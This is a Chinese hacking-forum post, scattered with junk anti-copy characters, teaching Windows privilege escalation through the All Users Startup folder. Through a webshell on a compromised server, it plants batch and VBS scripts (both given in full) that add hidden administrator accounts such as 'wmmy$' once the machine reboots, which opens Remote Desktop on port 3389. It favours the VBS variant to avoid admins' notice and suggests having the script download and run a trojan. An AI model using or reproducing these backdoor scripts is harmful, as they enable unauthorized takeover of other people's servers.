- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15914
- 在线时间
- 175 小时
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
+ N( k! e/ `" A7 c/ s/ ?( |- x2 y' Q) C启动 提权
; L2 }; ~: b9 K8 ]$ KC:\Docume~1\All Users\「开始」菜单\程序\启动
, L( u U; R1 R3 J* G5 p在这里必须有写入权限 否则此方法无效1 i: r$ H$ `( v' s G
因为我是在网吧 这里显示不了路径
, J& i8 C" k5 ^# s. {* g- B我去服务器上演示给大家看
* D7 T. {5 T9 Q% F [大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的) C% l7 g% d& Z
文件 从而运行我们的文件8 S: M) D. O! ]$ }9 g5 v& ~" U
这里有两中方式 第一种是批处理0 g5 o7 q6 o& n# K$ r4 x
我们来看下目前 我机器上的用户组# X$ j6 z' X8 f: _5 Y
目前我们没有521这个用户5 q- L. Q3 q& N$ r7 a
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示, [( Y$ H7 G% L' U
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现! t+ w* a' R8 c' ]" } C5 z: ]2 u: V
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的+ x; `& S1 k3 h( u
大家看 已经成功加入了WMMY用户
) g. _' V5 ?' V6 I网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
( ?: {! B! q, P/ m/ r( B& B当前终端服务端口: 3389 ~& x% N$ ?$ ~( x8 P
系统自动登录功能未开启
$ P- W' T$ }, Y- o3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
: a2 l1 m" R& f. w% u7 o& }. {) C bC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
3 S/ _8 T6 x6 V( `8 D1 {第一种隐蔽性太差 我们就用第二种吧( w5 ]8 S/ g, {( g
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去; {9 X1 O% W- }! W! I
从而取得了3389的登陆权限
+ [4 y( l0 E( n. Z# J! Z% d' ?0 ]; ^其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
, {& g- Y% r' M8 D4 i基本原理都差不多 我就不多介绍了0 w7 f# I' o Y* R! v
教程结束```( Q9 y" k$ {& H/ e4 g, a% V
@echo off7 ~0 l: P' b; i& j- L# x# I
net user 521 521 /add
& m- U* r9 E! d* l& i& l% Pnet localgroup administrators 521 /add
! T6 A( Q& A: I/ F: o, l5 _- ]9 X3 E3 l3 g
on Error Resume next
/ l5 E* ?1 ]+ X3 ]; N5 {set wshshell=createobject("wscript.shell") F4 l2 @' Y2 S+ K
a=wshshell.run("net user wmmy$ 1227 /add",0)
/ C8 {; R. O& h" ^. K" a% t8 ba=wshshell.run("net localgroup administrators wmmy$ /add",0) Q p. r }5 J" S4 U' G4 x6 G
4 m# ~+ A( B5 Q( \: q/ r/ s+ j( `: [ ^- Q$ G$ g6 \
点击下载2 `( k& \4 A: ] w
|
-
2
评分人数
-
|